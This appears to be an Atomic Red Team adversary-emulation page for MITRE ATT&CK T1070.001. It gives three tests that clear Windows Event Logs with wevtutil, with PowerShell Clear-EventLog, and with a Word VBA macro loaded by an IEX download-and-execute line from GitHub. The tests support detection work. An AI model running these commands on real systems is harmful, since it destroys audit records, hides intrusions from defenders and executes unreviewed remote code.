# T1070.001 - Indicator Removal on Host: Clear Windows Event Logs
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/001)
<blockquote>Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

* <code>wevtutil cl system</code>
* <code>wevtutil cl application</code>
* <code>wevtutil cl security</code>

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).</blockquote>

## Atomic Tests

- [Atomic Test #1 - Clear Logs](#atomic-test-1---clear-logs)

- [Atomic Test #2 - Delete System Logs Using Clear-EventLog](#atomic-test-2---delete-system-logs-using-clear-eventlog)

- [Atomic Test #3 - Clear Event Logs via VBA](#atomic-test-3---clear-event-logs-via-vba)


<br/>

## Atomic Test #1 - Clear Logs
Upon execution this test will clear Windows Event Logs. Open the System.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty.

**Supported Platforms:** Windows


**auto_generated_guid:** e6abb60e-26b8-41da-8aae-0c35174b0967





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| log_name | Windows Log Name, ex System | string | System|


#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


```cmd
wevtutil cl #{log_name}
```






<br/>
<br/>

## Atomic Test #2 - Delete System Logs Using Clear-EventLog
Clear event logs using built-in PowerShell commands.
Upon successful execution, you should see the list of deleted event logs
Upon execution, open the Security.evtx logs at C:\Windows\System32\winevt\Logs and verify that it is now empty or has very few logs in it.

**Supported Platforms:** Windows


**auto_generated_guid:** b13e9306-3351-4b4b-a6e8-477358b0b498






#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
$logs = Get-EventLog -List | ForEach-Object {$_.Log}
$logs | ForEach-Object {Clear-EventLog -LogName $_ }
Get-EventLog -list
```






<br/>
<br/>

## Atomic Test #3 - Clear Event Logs via VBA
This module utilizes WMI via VBA to clear the Security and Backup eventlogs from the system. 

Elevation is required for this module to execute properly, otherwise WINWORD will throw an "Access Denied" error

**Supported Platforms:** Windows


**auto_generated_guid:** 1b682d84-f075-4f93-9a89-8a8de19ffd6e






#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 


```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs"
```




#### Dependencies:  Run with `powershell`!
##### Description: Microsoft Word must be installed
##### Check Prereq Commands:
```powershell
try {
  New-Object -COMObject "Word.Application" | Out-Null
  Stop-Process -Name "winword"
  exit 0
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word manually to meet this requirement"
```




<br/>
